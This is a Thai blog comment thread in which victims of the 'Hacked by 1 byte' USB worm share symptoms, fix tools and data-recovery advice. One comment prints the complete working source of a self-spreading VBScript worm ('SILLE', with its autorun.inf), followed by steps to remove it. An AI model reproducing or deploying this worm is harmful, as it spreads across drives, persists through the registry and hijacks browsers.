จนในที่สุดก็เลยแบกหลบน้ำสงกรานต์ไปให้เพื่อนช่วยดูให้ ซึ่งข่าวดีก็คือ แม้จะเห็นว่ามัน 0 byte แต่พอเอาโปรแกรมกูไฟล์มาช่วย (easy recovery) มากู้ ก็เก็ยกลับมาได้หมดแล้วค่ะ

ตอนนี้เครื่องปลอดภัยดี แต่กลายเจ้าของกลายเป็นคนโรคจิตไปแล้ว ต้องคอยติดตามข่าวกับดูอาการของเครื่องเป็นระยะ  ก็เลยเหลือแต่เครื่องที่ทำงานน่ะค่ะ เครื่องนั้น เมื่อวานช่างเขาก็มาฟอร์แมตใหม่ แต่ไม่เข้าใจว่าทำไมมันยังขึ้นคำว่า Hacked by อยู่ดี  อาการอื่นๆก็ยังเป็นอาการของเครื่องที่ติดไวรัส พยายามลองลงโปรแกรมแก้แล้วก็ยังไม่ได้

อันนี้มาบอกเล่าประสบการณ์ค่ะ T____T ตอนนี้ก็พอเล่าได้ แต่ไอ้ตอนที่โดนนี่สิ พูดอะไรไม่ออกจริงๆ ขอบคุณเจ้าของเว็บนี้มากค่ะ ที่ช่วยพัฒนาโปรแกรมแก้ไว้ให้

อ้อ.. ขอบคุณคนสร้างไวรัสตัวนี้ด้วยค่ะ ทำให้ชีวิตนี้มีสีสันขึ้นแยะ 

บู้บี้จัง

                 ครับ

อ้างอิงจากบทความ

   3.ข้อมูลทุกไดรฟ์ที่ไม่ใช่ไดรฟ์  C :  จะโดนลบหายเกลี้ยง แม้กระทั่ง Map Network Drive (อ้างอิงจากคุณ com07) หากมี Map Drive เจ้า Worm ตัวนี้ก็จะเข้าไปในเครื่องอื่นๆ ในระบบLan ด้วย  หลังโดนหัวกะโหลกข้อมูลจะหายคงเหลือไว้เพียงเจ้า Worm ตัวแสบไว้ให้เห็นต่างหน้า

นั่นหมายความว่า ทุกไดรฟ์ ทุกพาร์ติชัน จะโดนลบหมดเลยครับ  ยกเว้นไดรฟ์ C  ซึ่งไว้สำหรับ  ให้ Worm ทำงานได้   แต่ข้อมูล ใน UserProfile  อย่าง DeskTop ของคุณก็จะหายไปด้วยครับ  

สมมติว่าเรามี HDD สัก 2 ตัว  ก็จะโดนลบทั้งหมด ทุก Harddisk ยกเว้น  Drive C: ครับ ที่ยังพอมีไฟล์ระบบให้เห็นอยู่บ้าง

เป็นคำถามที่ดีมากครับ....

link เสียหรือป่าวคับ

ดาวน์โหลดไม่ได้ครับ

ตอบคุณ chaye   ครับ

    เมื่อวานคงอัพโหลดไม่ผ่าน   เป็น 0 byte  วันนี้แก้ไขให้แล้วนะครับ ขอบคุณ คุณ chaye มากครับ  0 byte นี่คงจะติดมาจากคุณ ไม่แสดงตน มาหนะครับ หวังว่าคงไม่พบคำนี้ใน Drive ต่างๆอีกนะครับ อิอิ (แซวเล่น)

มันไม่ reset ครับผม

โฮ่ะ ๆ ๆ ...

ทำไงดี

 ผมลองเช็กดูแล้วนะครับ   เครื่องที่ผมทดสอบ

 รีเซ็ตได้ปกติ ครับ

 ผมไม่มั่นใจ ใน OS เหมือนกัน หลายเครื่องใช้ได้ บางเครื่องใช้ไม่ได้  และโปรแกรมนี้เขียนขึ้นมานี้   ผมทำเป็น Command Line ธรรมดานี่เองครับ ไม่ได้ซับซ้อนอะไรเลย   แปลกจัง

ที่ผมทดสอบมา WinXP SP2 ใช้ได้หมดเลย ไม่เคยไม่รีเซตเลยครั้งเดียว ครับ   WinMe 98 95 ใช้ไม่ได้แน่ครับ เพราะ Dos คนละเวอร์ชั่นกัน  (เพราะผมเขียนบน CommandLine บน Win NT )  จึงแจ้งมาให้ทราบทั่วกันครับ  ผมก็แปลกใจ   ถ้าไม่รีเซต แสดงว่าทำคำสั่งไม่จบ   ลองตรวจสอบให้แน่ใจนะครับว่า รันบน SafeMode หรือเปล่า และ ใช้ OS WinXP

วันนี้ยังไม่ได้เข้าไปลองแก้เครื่องที่ที่ทำงาน แต่เหมือนว่าช่างคอมฯ เขามาล้างเครื่องให้ แต่ทำไมพอเปิดเน็ตอีกที มันก็ยังมีคำว่า Hacked by เช่นเคย ..

ไว้วันอาทิตย์จะลองไปรบกะเจ้าหนอนร้ายนี้อีกรอบ ได้ผลประการใดจะรีบแจ้งให้ทราบค่ะ เผื่ออาจจะเป็นประโยชน์สำหรับคนอื่นๆต่อไป

ปล.1 คราวก่อนเล่าอาการไปแค้นไปจนลืมพิมพ์ชื่อ เลยกลายเป็น "คุณไม่แสดงตัวตน" คราวนี้กด show hidden file เรียบร้อยแล้ว แสดงตัวตนแล้วค่ะ ^_____________^

ปล.2 เครื่องที่โดนใช้ NOD 32 เช่นกัน แต่เครื่องที่บ้านที่รีเซ็ตได้ ล้างหนอนออกไปได้ใช้ BitDefener ค่ะ

คือว่าวันนี้คุณแม่หนูอ่าค่ะ ทำงานโดยใช้แผ่นดิสที่มาจากโรงเรียน แล้วพอเมื่อ 10 นาทีที่แล้วหนูเพิ่งมาเปิดคอม พอเปิด IE ขึ้นมาก็เจอเลย-*- มันขึ้นว่า Hacked by KKW-97D26637944 พอโดนเข้าคอมกระตุก+เหมือนจะค้างด้วยอ่าค่ะ พอมีวิธีไหมคะต้องการคำตอบด่วนนะคะ TT^TT

มันจะกู้ข้อมูลกลับมาได้ไหมครับ  ผมต้องการทราบวิธีแก้ด่วนมาก  เพราะงานใกล้ถึงกำหนดส่งเข้าไปทุกที

ผมโดนอาการคล้ายๆของคุณพลอยกับคุณข้าน้อยด้อยวิชาครับคือหน้าจอสลับไปสลับมาระหว่างหน้าจอ  desktop  กับหน้าจอที่ให้ใส่พาสเวิร์ดไปมา   ไม่รู้ว่าจะแก้ยังไง   แต่ที่เป็นห่วงที่สุดคือข้อมูลที่มีไม่รู้ว่าจะหายหมดเหมือนกับ  hacked by  1  byte  หรือเปล่า(คือผมโดนC:windowssystem32killVBS.vbs   อะไรประมาณนี้ครับไม่แน่ใจ)    ช่วยตอบหน่อยนะครับ 

หวัดดีคับ.......

 อยากจะให้เจ้าของ worm ตัวนี้ออกมารับผิดชอบต่อสิ่งที่เค้าทำน่ะครับ ผมเชื่อว่าถ้า worm ตัวนี้มีโอกาสได้ออก CNN ซึ่งจะส่งผลกระทบต่อระบบเศรษฐกิจของเมืองไทยได้เลยนะครับเนี่ย ไม่รู้ว่าผมเวอร์ไปรึป่าว ขนาดผมมั่นใจว่าระบบ security ของที่ office ผมเจ๋งแล้ว ยังไงก้อแพ้ external harddisk กับ handy drive........สรุปครับ ข้อมูลหายแบบกู้ไม่ได้เลย สามเครื่อง  ระบบที่ลงทุนไปหลายร้อยล้าน สุดท้ายก้อตาย worm ตัวนี้อยู่ดี

ตอนนี้เครื่องเจอหัวกระโหลกแล้วไม่ทราบว่าจะแก้ไขอย่างไร เราสามารถ fomat และลง window ใหม่ได้ไหม สามารถ boot เครื่องโดยใส่แผ่น window ได้หรือเปล่า ช่วยบอกวิธีแก้ด้วย วิทธยานิพนธ์จะนำเสนอวันที่ 4 พ.ค. นี้หายเกลี้ยงหมดเลย โชคดีที่เขียนใส่แผ่นไว้ได้ในบางส่วน แต่ file นำเสนอซิยังไม่ได้เขียนไว้เลย (เศร้า) ช่วยเราด้วยนะ จะขอบพระคุณมาก

ตอบคุณ  ช่วยทีค่ะ

http://gotoknow.org/blog/president/86031

ไปดาวโหลดมา เลยครับ แล้วแก้เลยครับ

ถ้าจะลบหนอนในแผ่นดิสก์  ให้ใช้เครื่องมือด้านบนก่อน อย่าดับเบิ้ลคลิกเปิดนะ ให้คลิกขวาแล้ว open ที่แผ่นดิสก์ จากนั้นไปดาวโหลดเครื่องมือนี้ มาแสดงเจ้า หนอน ออกมาครับ

http://gotoknow.org/blog/president/87671

เมื่อใช้เสร็จ หนอนก็จะโผล่ มา ให้ลบไฟล์ autorun.inf  และ ไฟล์สีเขียวๆฟ้าๆ  ที่เป็นรูปคล้ายๆ ราชโองการ   เป็นไฟล์นามสกุล vbs  ทิ้งโดยกด shift+delete ไปเลยครับ   จากนั้น รีเซตเครื่องสักรอบ  ก็น่าจะหายครับ

หากใครโดนลบไฟล์หมดแล้ว  หรือขึ้นหัวกะโหลกแล้ว  ข้อมูลโดนลบ แล้ว  

หากต้องการกู้ข้อมูลกลับ มาเหมือนเดิม ให้ไปที่นี่ครับ

 http://gotoknow.org/blog/SoftwareTechnics/91911 

แวะมาขอบคุณค่ะ โดนไปตั้งแต่วันอาทิตย์ เพราะไปช่วยดู Notebook ให้เพื่อนมา เอา thumb เราไปเสียบ กลับมาเครื่องตัวเอง ได้เรื่องเลย  แต่ตอนแรกคิดว่าไม่ร้ายแรง  ไม่ได้ตามข่าวตัวนี้ จนเมื่อกี้เพื่อนโทรมาบอกว่า ถ้าไม่รีบจัดการข้อมูลหมดแน่ๆ เลยรีบมา search หาทางแก้โดยด่วน  ทำให้รอดจากการต้อง format ทั้งหมดได้ ขอบคุณมากค่ะ เครื่องเพื่อนอีกคนก็แก้ทันไปด้วย รายนั้นโดนไป อาทิตย์กว่า  แต่ไม่แสดงอาการมาก

ฝากบอกคนที่คิด format thumb drive แล้วคิดว่าจะหายนะค่ะ  มันไม่ช่วยอะไรเลยค่ะ ถึง format ไปแล้ว  แต่ไฟล์ handydrive มันยังซ่อนอยู่ค่ะ ต้องเอามาลบออกอย่างเดียว

พอเปิดโปรแกรมในsafe mode แล้วrestart ปรากฎว่าเข้าlog in วินโดว์ไม่ได้คะ   ช่วยหน่อยคะ   ลองแก้โดยใช้โปรแกรมแล้วเป็นแบบนี้สองเครื่องแล้วคะ

เข้า Win ก็ไม่ได้ เข้า safeMode ก็ไม่ได้    ลองซ่อมวินโดวส์ดูครับ  โดยใช้แผ่นติดตั้ง นี่แหละ แล้วบูตจาก CD WIndoows  แล้ว ENter ที่ไดรฟ์ C ไปเลย  ไม่ต้องลบ พาร์ติชั่น แบบนี้ ผมว่าได้ชัวร์ครับ   (ข้อมูลก็ยังอยู่ ) ยังไง บอกผลมาด้วยนะครับ ผมรอดูคุณพลอยอยู่ครับ  อยากช่วยเหลือจริงๆ  ผมชอบคุณชื่อพลอยด้วย อิอิ(ไม่ค่อยเกี่ยวกันเลย ง๊าก..)

ก้ทำอย่างที่บอกไปแล้วค่ะ

ตอนนี้คอมก้ใช้ได้แล้ว 5 55

แต่ว่า มันเสียเวลา ข้อมุลก้ยังอยู่ค่ะ ๆ

เอ่อออ.

แลตกลงมันเกิดจากอะไรคะ?

หนอนไปทำลายไฟล์ ระบบ  หลายตัวครับ   ดังนั้นจึงต้องซ่อม ใหม่ ให้ใช้ได้ เหมือนเดิมครับ 

อ่านจบแล้วขนลุกเลยครับ

อะไรจะน่ากลัวขนาดนั้น

ตอนนี้แอนตี้ในท้องตลาดรู้จักเจ้าตัวนี้หรือยังอะครับ

 ขอบคุณสำหรับข้อมูลทั้งหมดครับ

ขอบคุณครับ

แอนตี้ในท้องตลาดยังหาไม่เจอครับ  เพราะเป็น Worm ในไทยคร๊าบบบ  แต่ AHDV  กันได้ครับ 

ดูรายละเอียด http://gotoknow.org/blog/president/92638

อย่าลบตัวนี้ค่ะ 

userinit.exe
ถ้าลบ คุณจะ log in ไม่ได้ และ safe mode จะเข้าไปแก้ไขไม่ได้ เพราะว่า log in ไม่ได้อยู่ดี

วิธีแก้ ให้ก๊อปมาจากเครื่องอื่นแล้วมาแทนที่ที่เดิม แล้วแก้ด้วยการขุด system restore ค่ะ 

หลังผมถูกจู่โจมครั้งที่สอง ผมนึกว่าจะต้องไดซื้อเครื่องคอมใหม่ แต่หลังจากได้รับคำนะนำดีๆจากเว็บนี้ผมก็ลองทำตาม ปรากฎว่าบนแถบIEที่เขียนว่าNoVirusNoWorkn....ได้หายไปหลังจากโหลดProgramUpDate19April เนื่องจากผมไม่ค่อยจะมีความรู้เกี่ยวกับเรื่องคอมมากนักดังนั้นผมจึงได้แต่หวังและภาวนาว่ามันจะไม่กลับมาพร้อมกับอาวุธใหม่เพราะผมยังไม่ยากถูกตราหน้าว่าเป็นคนกระทื่บคอมพักจริงๆ  อีกอย่างผมเลื่อมใสในความสามารถของคุณจริงๆที่คิดค้นวิธีกำจัดเจ้าตัวร้ายได้ในคลิ๊กครั้งเดียว เก่งจริงๆและยังแนะนำวิธีการกูกไฟร์กลับมาใหม่.........สุดยอดจริงๆครับ+++!!!!!!!!!!!!!!!!

ขอบคุณมากครับ

ผมโดนไวรัสนี้เล่นงานเหมือนดังคำอธบายทุกประการ เสียดายไหวตัวช้าไป ทำให้ HDD เสียหายแล้ว จึงขอรบกวนผู้รู้ดังนี้ครับ

1. ผมยังมีไวรัส Win32/VB.FM Worm อยู่ใน Portable HDD ยังกำจัดไม่ได้ ทำอย่างไรดีครับ

2. HDD ที่เสียหาย ผมทดลองใช้ Program EasyRecover , Drive recovery แต่ flie ที่กู้ได้ ไม่เหมือนเดิม คือ ไม่ได้กลับเป็น folder และชื่อ file ภาษาไทย ข้อมูลหลายสิบ GB รบกวนช่วยให้คำแนะนำด้วยครับ เศร้าจริงๆ

ขอบคุณมากๆ ครับ

ธนิต 

ผมก็เจอเหมือนกันเมื่อวันก่อนเองครับคืออยู่ๆก็double click ที่ ไดรฟ์ต่างๆไม่ได้ต้องคลิกขวาเคยอ่านเจอเหมือนกันว่าอาจเป็นเพราะตัว Hack byGodzilla ลองแก้ตามวิธีที่บอกแต่ไม่ได้ครับ เวลาเราเปิดie มันก็จะขึ้นหน้าเวปของ http://dri-services.eu/hosted-by/   ใครเจออาการแบบนี้บ้างครับ

เวลาเราโชว์ทุกไฟล์ก็จะเห็น2ไฟล์ที่เป็นตัวการคือ

1. autorun.inf

2.ie.vbs

ในไฟล์ autorun.inf ประกอบด้วยคำสั่งดังนี้

[autorun]
shellexecute=wscript.exe ie.vbs

ในไฟล์ ie.vbs ประกอบด้วยคำสั่งดังนี้

'virus name is SILLE
'By Winxp32
on error resume next
dim ms,winpath,fs,fd,mf,atr,tf,rg,nt,chk,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe ie.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
chk = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
ms=ms&text.readline
ms=ms & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\ie.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\ie.vbs",2,true)
tf.write ms
tf.close
set tf = fs.getfile(winpath & "\ie.vbs")
tf.attributes = 39
for each fd in fs.drives
If (fd.drivetype = 1 or fd.drivetype = 2) and fd.path <> "A:" then
set tf=fs.getfile(fd.path &"\ie.vbs")
tf.attributes =32
set tf=fs.createtextfile(fd.path &"\ie.vbs",2,true)
tf.write ms
tf.close
set tf=fs.getfile(fd.path &"\ie.vbs")
tf.attributes =39
set tf =fs.getfile(fd.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(fd.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(fd.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\ie.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","¤¤¤¤~~~---@        SILLE"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.sille.net"
if chk <> 1 then
Wscript.sleep 333333
end if
loop while chk<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

แต่ผมนั่งลองแก้ดูแล้วปรากฏว่าใช้ได้ตามปกติครับ

ถ้าใครเจอเหมือนผมลองเอาวิธีนี้ไปแก้ดูนะครับ

1.เปิดmycomputer  ไปที่Tab tool เลือก folder option  เลือก Tab view ติ๊กตรง show hidden file and folder ติ๊กเครื่องหมายถูกออก หน้า Hide extensions for know file types และ Hide protect operation system file

2.กด Alt+Ctrl+Delete

ไปที่Tab Process ตรง Image Name มองหา wscript.exe เลือกที่wscript.exe และกด EndProcess ตอบ Yesให้ทำอย่างนี้ทุกตัวเพราะบางทีอาจจะมี wscript.exe มากกว่า 1 ตัว

3.ไปที่mycomputer double click ออกมา

ไปที่ไดรฟ์ c: อย่าdouble click ให้คลิกขวาแล้ว open

มองหาไฟล์ Autorun.inf และ ie.vbs

คลิกขวาไปที่ไฟล์แต่ละไฟล์ ไปที่ properties

เอาเครื่องหมายถูกหน้า read-only ออก

ทำอย่างนี้ทั้ง 2 ไฟล์

หลังจากนั้นก็ลบทั้ง 2 ไฟล์ได้ทำอย่างนี้ทุกไดรฟ์ที่มี

4.หลังจากนั้นให้เข้าไปที่ Run พิมพ์ Regedit

เข้าไปที่ "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

ลบคีย์ที่เป็นตัวสีแดงออก คือ MS32DLL

เข้าไปที่

"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","¤¤¤¤~~~---@        SILLE"
  ลบคีย์ที่เป็นตัวสีแดงออก 

เข้าไปที่ 

"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.sille.net"

  ลบคีย์ที่เป็นตัวสีแดงออก 

หลังจากนั้นลอง search ไฟล์ autorun.inf และ ie.vbs

ช่วยด้วยค่ะ มีคนไม่ประสงค์ดี เข้าไปเปลี่ยนรหัสผ่านเมล์ของฮอตเมล์เรา ใครสามารถทำได้บอกด้วยนะค่ะ หรือว่าเมล์กลับมาหาเราด้วย มาบอกกับเราที เราอยากได้เมล์คืน ตอนนี้ต้องยืมเมล์เพื่อนทำงานไปก่อนนะ อยากได้เมล์คืนมากๆใครสามารถบ้างค่ะ บอกที ติดต่อกลับมาด้วยนะค่ะ ขอบคุนล่วงหน้านะค่ะ

หนูโดนตัวนี้เหมือนกันค่ะ copy โปรแกรมที่เครื่องอื่นที่โหลดมาไปใส่ในเครื่องแล้วก็ทำตามขั้นตอนที่บอกในsave modeแต่อ่านนิดเดียวและไม่ restart ด้วยค่ะทำไงดีค่ะ

ขอบคุณมากๆค่ะ น้องกีต้าค่ะ

-..-

น่าเสียดายที่มาอ่านหน้านี้ช้าไป ผมโดนมันเล่นงานไปแล้ว หายไป 2 Drive คือ Drive D: กับ E: รวมงาน 50 GB กลายเป็นไช่เน่า -_-''

เครื่องติดมาประมาณ 2 อาทิตย์โปรแกรมที่ดาวโหลดไป(ทั้ง2version)ไม่สามารถฆ่ามันได้เพราะเครื่องได้ขึ้นกะโหลกไปแล้ว ช่วยหาทางกำจัดมันกับเครื่องคอมที่ได้ติดไปก่อนแล้ว ช่วยด้วยค่ะ

โดนเจ้าไวรัสตัวนี้เล่นงานเหมือนกันค่ะ    ที่ทำงานไดร์ฟส่วนกลางโดนทำลายหมด  ครั้งที่สองแล้วค่ะ   ซ้ำร้ายกลับมาบ้านมันยังตามมาเล่นงานที่บ้านด้วยค่า  แต่ที่บ้านยังใช้งานได้เพียงแต่เรียกหาแผ่น และมีHACK HACKED BY 1 BYTE  ขึ้นตลอดที่ IE  เศร้าเลยค่า โน้ตบุ๊คน้องก้อติดไปด้วย...............*-*  

*******คนคอน****

.....ขอบคุณเป็นอย่างมาก สำหรับความรู้ใหม่เอี่ยม จากไวรัส หัวกระโหลก Worm ในไทย เพราะว่าเราโดนเมื่อตอนบ่าย 3 โมงวันนี้เองสด ๆ ร้อน ๆ เป็นเรื่องที่เศร้ามาก ๆ เลย ข้อมูลที่ทำงานมา 2 ปี เต็ม ๆ หายเรียบ

.....อาการ คือเปิด Note Book hp nx-6120 ขึ้นมาสักครู่เท่านั้น เกิดการถามหา CD Window MS SP-2 อยู่ตลอดเวลา แล้วที่หน้าจอก็แสดงภาพหัวกระโหลกไขว้ กระพริบตลอดเวลา แล้วก็คลิกอะไรไม่ได้เลย นอกจากปิดเครื่อง พอเปิดมาอีกครั้ง ก็พบแต่หน้าจอมืดดำ เหมือนฝันร้ายเลยท่านผู้ชม จบสิ้นทำอะไรไม่ได้เลย มันเศร้ามาก พรุ่งนี้คงต้องยกเครื่องไปให้เซียนที่พันธ์ทิพย์ช่วยกู้ชีพ Note Book ไม่รู้ว่าจะรอดหรือเปล่า.

ขอบคุณมากครับพี่ๆที่ช่วยสอนวิธีการแก้ต่างๆ

ผมไม่ได้อยู่ในประเทศไทย แต่เพื่อนผมเปิดร้านคอม

โดนไป 15 เครื่องล้างใหม่หมดเลย กะโหลกหมดแล้ว

อยากเจอคนคิด คนทำworm ตัวนี้น่ะ อย่างว่าแหละกฎหมายเมืองไทยไม่มีอะไรมาคุ้มครอง เฮ้ออออ

ไม่รู้จะช่วยงัย 

ไม่บ่อยนักที่จะได้เห็นคน IT มีอุดมการณ์ช่วยเหลือคนอื่นอย่างเต็มที่ของขอบคุณแทนหลาย ๆ คนไว้ในที่นี้ด้วยครับ

ผมได้ประโยชน์จากในส่วนนี้เหมือนกัน แต่ของผมโดย hacked by 8bits ครับ ยังไม่เสียหาย กำจัดได้ก่อนครับ

เครื่องที่ทำงานเจอเหมือนกันค่ะใช้ handydrive มาจิ้มที่เครื่องที่บ้านโดนไปด้วยกัน แต่เครื่องที่บ้านปรากฏขึ้นหัวกะโหลกก่อนแล้วตอนนี้ข้อมูลหายหมดเลย ที่แย่ไปกว่านั้น เครื่องมองเห็นharddisk แค่ห้องเดียวอีกห้องนึงมองไม่เห็น format ก็ไม่ได้ จะลงโปรแกรมใหม่ก็ติดที่ harddisk มองเห็นแค่ครึ่งเดียว  80 g  มองเห็น แค่ 32 g ที่แบ่งไว้ ใครรู้วิธีช่วยแนะนำด้วยค่ะลำบากมากเลย  ทดลอง load ตัวที่แนะนำมาใช้เครื่องก็ไม่ restart ทั้งที่เป็น xp  please help me

ตอบคุณ เจออีกคน ครับ

ตัวแก้ตัวนี้ใช้ได้ตอนที่ยังเป็นอาการเริ่มต้นครับ คือตอนที่ยังไม่ขึ้นหัวกะโหลกที   แต่ของคุณ เรียบร้อยแล้ว  แสดงว่าข้อมูลหายหมดแล้วครับ    ต้องกู้คืนอย่างเดียวครับ  ผมมีวิธีกู้คืนให้แล้ว ใน Blog นี้เลยครับ

ตอบคุณ Bird

hack by 8 bit

http://gotoknow.org/blog/president/86031

ขอคุณค่ะ  รบกวนถามต่อนะคะ ทดลอง load โปรแกรม  getdataback 3.04 มาใช้ตามคำแนะนำแล้วปรากฏว่าขั้นตอนที่จะทำการ copy เครื่องแจ้งว่าใช้ได้เฉพาะ licen ทำให้กู้คืนไม่ได้   และ HDD  ที่มี 80 g  ตอนนี้มองเห็นแค่ 32 g   ควรแก้ปัญหาอย่างไรดีคะ รบกวนด้วยค่ะ  หมดหนทาง

คุณ  disktake ครับ

ให้ copy systeminit.exe  จากเครื่องอื่นมาไว้ HDD ตัวเดิมครบ

หุหุ ผมเข้ามาเจอข้อมูลนี้ช้าไปวันเดียวเองครับ

ตอนนี้ข้อมูลของผมหายเกลี้ยง ฮาร์ดดิส เป็น SCSI  ตอนนี้ก็เครื่อง Detect HDD ไม่เจอ ทำให้ทำอะไรก็ไม่ได้ Format ก็ไม่ได้ เพราะไม่เจอ HDD

ข้อมูลของผม เกือบ 60 GB ทำอย่างไรถึงจะได้คืนครับ

ขอบคุณมากๆครับ ผมงมอยู่ทั้งวันเลย T_T

นี่ครับกรณีผมกว่าจะได้หมัดสั่งจากที่นี่
-->http://www.pantip.com/tech/hardware/topic/HP2368817/HP2368817.html#10

เครื่องผมค้างครับเปิดมาไม่ถึง สองนาทีก้อค้างตลอดเลยไม่ทราบว่าโดน worm ตัวนี้รึป่าว


 ผมลองทำดูแล้วครับใช้ 1Byte{NoVWM}SKULLFixToolsv 2.06
ทำตามทุกอย่างที่บอก แต่เครื่องผมยังค้างอยู่เลยคับ
(แต่เข้า SafeMode ไม่ค้างครับ)

ตอนนี้ผมแก้ได้แล้วครับเครื่องใช้เหมือนเดิมไม่ค้าง
แต่พอผมปิดเครื่องไป ไวรัสก้อกลับมาอีกเหมือนเดิม
แล้วผมก้อแก้อีกรอบ ก้อใช้ได้เหมือนเดิม

ที่นี้ผมจะ format เครื่อง มันขึ้นว่า

file\i386\biosinfo.inf could not loaded.
The error code is 32768

Setup cannot continue. Press any key to exit

ช่วยตอบผมเร็วๆหน่อยนะคับ ขอบคุณคับ

สวัสดีครับ เครื่องผมเขาwindowไม่ได้มันฟ้องขั้นมาให้ใส่ password ส่งใส่ติดไว้รัส ผมก็ใส่ hacked แล้วแต่ก็เข้าwindow ไม่ได้ช่วยชี้แนะด้วยครับ

ช่วยด้วยครับ เครื่องที่ทำงานโดนแบบนี้

folfolder option, task manager หาย ตอนนี้ เครื่องเรียกหา window xp pro service pack 2 ตลอด

ทำทุกอย่างแทบทุกวิธี ลงวินโดว์ไหม่ก็ไม่หาย ไม่สามารถเข้ารีจิสทรี task manager ได้ รัน smitfraudfix ใน safe mode ไม่ได้

ถ้าเปงคอมที่บ้านจะไม่ worry คอขาดแน่ผม

อ่า...ตอนนั้นไม่รู้ว่า Hacked by 1 มีแบบ novirus nowork nomoney ด้วย ก็เลยเอาอีกตัวไปแก้ แล้วมันก็ใช้ได้นะ ที่ explorer bar ก็ไม่มีพวกนี้ขึ้นแล้วอ่ะค่ะ

ส่วนอีกเครื่องของเครื่องที่ทำงานเหมือนกัน สังเกตเห็นว่าเป็นแบบ nomoney ก็เลยเอาตัวใหม่มาลองดู แต่ไม่เห็นมันรีสตาร์ทเองเลยอ่ะค่ะ ก็เลยกดรีเองเลย ไม่รู้จะเป็นไรเป่า แต่เปิดมา explorer ก็เป็นปกติแล้ว แล้วไอ้ที่ชอบๆถามหาแผ่นก็หายไปด้วย...

ขอบพระคุณที่ทำโปรแกรมดีๆ มาให้ใช้นะคะ...สุดยอด

ไม่ได้เข้ามานาน คอมเมนท์เยอะเลยครับ  ต้องเคลียร์กันหน่อยแล้วววว

 ตอบกันเลยดีกว่าครับจากคำถาม

ถามมา

http://web.thaicool.com/hong6/yw60.html

หน้าตาคนปล่อยไวรัส

หวัดดีค่ะ คือ โดนเจ้าไวรัสตัวนี้เหมือนกันค่ะ hackby 8bit ขอถามหน่อยนะคะ

- hackby 8bit นี่ต่างกับ hackbit1bit หรือตัวอื่นยังงัยอ่ะคะ

- ตอนที่เครื่องโดนตอนแรกก้อมีอาการเหมือนกับหลายคนคือ เปิด drive ต่างๆไม่ได้ ต้องคลิกขวา แล้วเปิด open แต่ตอนนี้ลงโปรแกรมฆ่ามันแล้ว และลอง format เครื่องใหม่แล้วก้อหายค่ะ แต่ตัวไดรฟ์ c ของเราจิงๆ ความจุคือ18 กิ๊ก แต่พอลงเครื่องใหม่แล้วความจุเหลือแค่ 10 กิ๊ิกเอง มันหายไปไหนตั้งเกือบ 7 กิ๊ิก แล้วตอนก่อนเปิดเครื่องก้อมีหน้าจอดำๆมาเตือนเรื่องเกี่ยวกับ cmos ปามานนี้ ถ้าจาเข้าวินโดว์ให้กด f1 หยั่งงี้ต้องแก้ยังงัยคะ

 ช่วยตอบด้วยนะคะ ขอบคุณค่ะ

ช่วยด้วยผมโดนไวรัสแก้ไม่ออกมันชื่อว่า

Hacked by Godzilla  ช่วบผมแก้ทีนะครับช่วยตอบด่วนเลยถ้ามีโปรแกรมดีๆช่วยผมด้วยนะครับช่วยที

สำหรับคนที่สนใจว่าใครสร้างเจ้า Worm  Hackby 1 Byte ทั้ง 2 ตัวนี้

ท่าทางจะlinkไปที่
 
http://web.thaicool.com/hong6/yw60.html

น่าจะถือได้ว่าเป็นอาชญากรทางคอมพิวเตอร์นะ 
กรมสอบสวนคดีพิเศษมัวทำอะไรอยู่น่าจะนำตัวมาลงโทษเพื่อไม่ให้เป็นเยี่ยงอย่าง

ขอบคุณมากครับ ผมไปดูแล้ว เก่งนี่เด็กใต้ แต่เก่งในทางที่ผิดไม่ดีเลย ทำให้คนอื่นเดือดร้อน ในถานะผมก็เด็กใต้ ขอบบอกว่าไม่ดีเลยนะครับ ยิงตอนนี้เขายิ่งมาคนใต้ในทางลบด้วย สร้างสรรค์กันหน่อย ครับ

ผมเจอไวรัสที่ทำให้เครื่อง เปลี่ยนจาก การคลิ๊กธรรมดา กลายเป็น double click ครับตอนนี้ยังติดอยู่

อาการคือ คลิ๊กที่ ไอคอนไหนก็ตามมันจะเปิดเข้าไปเลย เหมือนกับเราไป double click เข้าไปเลยครับ รบกวนขอความคิดเห็นด้วยครับแก้ไม่หาย ติดนานแล้ววว

ขอขอบคุณม๊ากมาก

      วันนี้เปิด เน็ตแล้วติด Hacked by 1 byteขึ้นมาก็หาโปรแกรมกำจัดไวรัส  โหลดได้มาแล้ว  ทำตามที่แนะนำแล้วได้ผลค่ะ   ขอขอบคุณอีกครั้ง

ขอบคุณมากครับคุณช่วยแก้ไวรัสให้

from ม.ราชภัฏนครศรีธรรมราช

สวัสดีทุกคนค่ะ พอดีมีเรื่องจารบกวนถามน่ะค่ะ แบบว่าเราไม่ค่อยรู้เรื่องคอมซักเท่าไหร่ แต่ว่าคอมเรามีรูปกระโหลกขึ้น แล้วพอเวลาเปิดเครื่องขึ้นมามานม่ะเข้าหน้า วินโดว์ให้อ่ะค่ะ ไม่รู้ต้องทำอย่างไงบ้างค่ะ อยากได้ข้อมูลเก่าๆๆคืนน่ะค่ะ รบกวนผู้รู้ทุกคนช่วยแนะนำวิธีแก้ทีละขั้นตอน แบบง่ายๆๆเข้าใจง่ายหน่อยน่ะค่ะ เพราะเราไม่ค่อยรู้เรื่องคอมซักเท่าไหร่ รบกวนหน่อยน่ะค่ะ

